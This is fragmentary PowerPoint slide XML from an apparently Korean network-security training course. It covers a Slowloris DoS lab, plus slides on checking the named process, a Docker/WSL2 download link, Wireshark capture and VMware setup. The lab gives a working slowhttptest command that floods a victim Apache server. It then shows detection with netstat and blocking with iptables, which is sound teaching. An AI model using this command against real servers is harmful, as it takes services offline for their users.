            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | grep named</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/named</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | grep named</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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{304715AE-F2D4-41B7-862C-8CAB30285A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="899280"/>
            <a:ext cx="5400040" cy="3046857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{689F28BD-F87C-43A6-9DAA-0E83A08F0439}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="531887"/>
            <a:ext cx="5400040" cy="2961386"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="직사각형 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24349896-23EB-465B-9AA6-7B5A35EBDB2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6694714" y="2816679"/>
            <a:ext cx="2506436" cy="4816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Picture 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCDFBB7A-FEBD-41D1-A96D-BA74B152BEF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="4973259"/>
            <a:ext cx="5400040" cy="561086"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ADDB49C-CF5A-4270-9020-7A4668FCB783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="5601572"/>
            <a:ext cx="5400040" cy="661416"/>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168875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dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>WSL2 Docker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아래 링크로 접속</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://hub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>.docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>com/editions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/community</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/docker-ce-desktop-windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="화살표: 오른쪽 15">
            <a:hlinkClick r:id="rId3"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8E9E5A7-15E1-45EB-848F-0E80BCEF082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360187D-B2D5-45A4-AFB6-441D2F08CBE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001416E-EF92-470D-AFA9-C4358DB5396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4EAC4FD2-0C69-48E3-A113-DC914FF6FC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3537835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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>5) wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 패킷 확인</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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DF9B646-7D29-463F-82C6-FE73F865C07E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="703338"/>
            <a:ext cx="5400040" cy="3908806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BAB0F42-D264-4B56-9055-8697D1412C1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6571343" y="760488"/>
            <a:ext cx="3360420" cy="754380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="14351" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="305830731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/Training/Unit/Net/15</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 15. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Slowloris</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아파치 웹 서버가 동작하고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서버를 대상으로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Slowloris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Slowloris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Slowloris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탐지하고 방어할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9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Victim(CentOS 6.4 / 10.10.1.101)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3" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB54BA98-243A-4E14-B824-BBBE2268CCC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3411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1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격 전 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>10.10.1.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버로 웹페이지 접속 시 접속 가능</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공격서버에서 실습서버로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>slowloris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>slowhttptest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -c 4000 -g -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>slowloris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 10 -r 100 -t GET -x 3 -p 3 –u http://10.10.1.101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5" name="_x247859000">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078FAAE2-E477-41F2-AE13-F4AA63DAD5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70560"/>
            <a:ext cx="5400675" cy="3957638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="_x247860280">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9F8E71E-1C3D-4BB0-9660-B684439BC6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145" y="890065"/>
            <a:ext cx="5400675" cy="3235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267970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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>10.10.1.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버로 웹페이지 접속 시도 시 접속 불가</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(* history –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 저장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRP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49" name="_x247860760">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B72ABFF5-7366-4F3A-9D09-C0CF0485C4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8848"/>
            <a:ext cx="5400675" cy="39116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_x247860440">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD29B156-1DFE-4589-BD6F-F7FF5BA3B0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9088" y="938784"/>
            <a:ext cx="3908425"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46147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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 교관공격 버튼 클릭 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Setup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180" y="4096256"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="3073" name="_x247863320">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9807132F-769D-4F8D-A491-7B45DF7F714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39491"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500181" y="906487"/>
            <a:ext cx="5400674" cy="2104611"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="화살표: 오른쪽 14">
            <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00733412-9AE5-4585-8405-12AC612CE9B3}"/>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3611964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/Training/Unit/Net/15</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 15. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Slowloris</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아파치 웹 서버가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Slowloris DoS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받아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정상적인 서비스가 불가능한 상황이다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식별하여 방화벽으로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Slowloris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Slowloris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탐지하고 방어할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Victim(CentOS 6.4 / 10.10.1.101)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A945EE6F-447F-47A7-A88B-6A750291CB2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70631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공격이 들어오는지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tna</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웹 브라우저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a: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localhost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접속 시도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iptable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -A INPUT -s 10.10.1.166 -j DROP</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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>웹 브라우저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 접속</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7" name="_x247859480">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE161DF9-0C62-4686-BEA6-25938C696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877824"/>
            <a:ext cx="5400675" cy="3208338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4099" name="_x247859320">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCE5AE86-8F64-44A8-A218-223DBDBA1C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040" y="4594988"/>
            <a:ext cx="4427538" cy="1363663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4101" name="_x247859160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5A90F5E-D397-4FBF-9094-6E68189176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655957"/>
            <a:ext cx="540067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4103" name="_x247859080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{639FEAE2-9ACB-496E-BD5C-22BE5EA42C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5936" y="3090672"/>
            <a:ext cx="4694238" cy="198438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4105" name="_x247859480">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BCFC429-5F60-4825-836F-B8069AE327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17832" y="3840480"/>
            <a:ext cx="5400675"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115220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1" name="_x247860040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BD1F33-A6EF-4486-B103-18677A276F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980" y="719328"/>
            <a:ext cx="2522538"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71124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8301193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9597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/Environ/VMware</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>VMware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>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VMware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>다운로드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  접속</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>,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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위 이미지 클릭하여 다운로드 진행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
